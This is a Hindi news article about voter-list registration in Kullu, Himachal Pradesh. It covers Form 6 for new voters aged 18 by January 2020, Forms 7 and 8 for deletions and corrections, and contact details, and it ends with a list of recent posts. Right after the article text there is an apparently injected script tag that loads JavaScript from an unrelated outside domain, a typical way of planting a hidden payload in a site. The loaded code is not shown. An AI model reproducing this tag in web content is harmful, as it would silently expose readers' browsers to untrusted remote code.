Categories: हिमाचल

18 साल आयु पूरी होने पर वोट लिस्ट में दर्ज़ करवाएं नाम

<p>कुल्लू के निर्वाचक रजिष्ट्रीकरण अधिकारी अनुराग चंद्र शर्मा ने बताया कि नए मतदाता जिनका नाम वर्तमान सूची में दर्ज़ नहीं है और जिनकी आयु पहली जनवरी 2020 को 18 साल या इससे अधिक हो गयी है, उनके नामों को मतदाता सूची में जोड़ा जाएगा। इसके लिए आवेदन फार्म संख्या 6 में करना होगा और साथ में जन्मतिथि प्रमाण पत्र, वर्तमान निवास प्रमाण पत्र की छायाप्रतियां और एक पासपोर्ट आकार का रंगीन फोटो सलंग्न करना होगा। मतदाता सूचियों का प्रारूप प्रकाशन निर्वाचक रजिष्ट्रीकरण अधिकारी, संबंधित तहसील कार्यालय, बूथ लेवल अधिकारी और प्रत्येक मतदान केन्द्र में 15 जनवरी, 2020 तक किया जाएगा।</p>

<p>मृत्यु और निवास स्थान परिवर्तन के कारण पहले से दर्ज़ नामों को हटाने के लिए फार्म 7 में आवेदन करना होगा। मतदाता सूची में नाम, पता, आयु और जन्मतिथि गल्त होने की शुद्धि के लिए फार्म 8 में आवेदन करने को कहा गया है। फोटो की शुद्धि के लिए रंगीन फोटो साथ लगाना होगा।</p>

<p>अनुराग चंद्र ने बताया कि जो मतदाता किसी कारणवश अपना पहचान पत्र दूसरी बार बनवाना चाहते हैं, वे भी संबंधित अभिहित अधिकारी या बूथ लेवल अधिकारी के कार्यालय में संपर्क कर सकते हैं। इस संबंध में अधिक जानकारी के लिए निर्वाचक रजिष्ट्रीकरण अधिकारी के फेसबुक पेज ईआरओ कुल्लू या इलैक्शन ऑफीस कुल्लू पर लॉगइन किया जा सकता है। कोई भी व्यक्ति इन्टरनेट के माध्यम से ऑनलाइन फार्म प्रस्तुत कर सकता है। अधिक जानकारी के लिए दूरभाष उसंख्या 01902-222010 पर कार्यालय दिवस में वांछित सूचना प्राप्त की जा सकती है।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

विरासत भी और विकास भी यह हैं मोदी सरकार की गारंटी: कंगना रंनौत

विरासत भी और विकास भी यह हैं मोदी सरकार की गारंटी, सांस्कृतिक राष्ट्रवाद जन जागरण…

22 mins ago

मुख्यमंत्री ने पूर्व विधायक नारायण सिंह स्वामी के निधन पर शोक व्यक्त किया

मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने घुमारवीं विधानसभा क्षेत्र से पूर्व विधायक नारायण सिंह स्वामी…

57 mins ago

लाहौल स्पीति के नीलदा पीक के लिए 7 सदस्यीय पर्वतारोहित रवाना

स्पीति के  6303 मीटर की ऊंचाई  चाउ चाउ कांग नीलदा पीक के लिए 7 सदस्यीय…

4 hours ago

4 जून को इंडी गठबंधन काकुनबा होगा धराशायी: बिंदल

4 जून को इंडी गठबंधन काकुनबा होगा धराशायी: बिंदल इंडी गठनबंदन का वैचारिक दिवालियेपन के…

5 hours ago

केलांग में सामान्य पर्यवेक्षक विनीत नंदनवर ने चुनाव प्रबंधों का लिया जायजा

केलांग में सामान्य पर्यवेक्षक विनीत नंदनवर ने चुनाव प्रबंधों का लिया जायजा पारदर्शी, निष्पक्ष और…

7 hours ago

मूमता में मतदाताओं को किया जागरूक

नगरोटा उपमंडल के मूमता पंचायत में सूचना एवं जनसंपर्क विभाग के कलाकारों ने लोक संगीत…

7 hours ago